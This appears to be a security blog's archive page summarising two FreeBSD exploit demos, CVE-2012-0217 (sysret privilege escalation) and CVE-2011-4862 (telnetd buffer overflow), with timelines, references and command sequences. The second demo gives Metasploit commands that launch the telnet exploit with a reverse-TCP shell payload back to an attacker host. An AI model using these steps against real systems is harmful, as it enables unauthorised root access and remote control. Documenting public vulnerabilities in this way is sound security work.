Tag Archives: FreeBSD

CVE-2012-0217 Intel’s sysret Kernel Privilege Escalation on FreeBSD Demo

Exploits

Timeline :

Vulnerability discovered by Rafal Wojtczuk
Coordinate public release of the vulnerability the 2012-06-12
FreeBSD PoC provided by fail0verflow the 2012-07-05

PoC provided by :

Rafal Wojtczuk
John Baldwin
fail0verflow

Reference(s) :

CVE-2012-0217
OSVDB-82949
FreeBSD-SA-12:04.sysret

Affected version(s) :

All supported versions of FreeBSD previous

Tested on FreeBSD 9.0-RELEASE

Description :

FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. To exploit this vulnerability, an attacker must be able to run code with user privileges on the target system.

Commands :

uname -a
id
gcc -o CVE-2012-0217-sysret_FreeBSD CVE-2012-0217-sysret_FreeBSD.c
./CVE-2012-0217-sysret_FreeBSD
id

CVE-2011-4862 FreeBSD Telnet Buffer Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability the 2011-12-23
Metasploit PoC provided the 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a